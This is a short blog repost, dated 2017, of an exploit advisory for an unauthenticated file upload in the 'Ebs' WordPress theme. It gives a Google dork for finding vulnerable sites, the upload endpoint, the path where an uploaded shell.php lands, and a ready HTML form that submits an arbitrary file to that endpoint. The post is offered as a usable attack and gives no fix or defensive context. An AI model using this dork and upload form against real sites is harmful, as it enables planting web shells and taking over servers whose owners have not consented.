اخر الاخبار

mercredi 3 mai 2017

MES : Wordpress Theme Ebs File Upload Vulnerability | CSRF


#################################################################################
# Wordpress Theme Ebs File Upload Vulnerability | CSRF
# Author : Berandal
# Google Dork: inurl:/wp-content/themes/ebs/
# Tested on: Win 7, Linux
# Blog : http://www.maxteroit.com/

#################################################################################




+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

# [!] Exploit : http://127.0.0.1/wp-content/themes/ebs/server/php/
# [!] File Location : http://127.0.0.1/wp-content/themes/ebs/server/php/files/shell.php

#################################################################################
#[*] CSRF:
#################################################################################
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/ebs/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
#################################################################################

Aucun commentaire:

Enregistrer un commentaire

Disqus Shortname

Comments system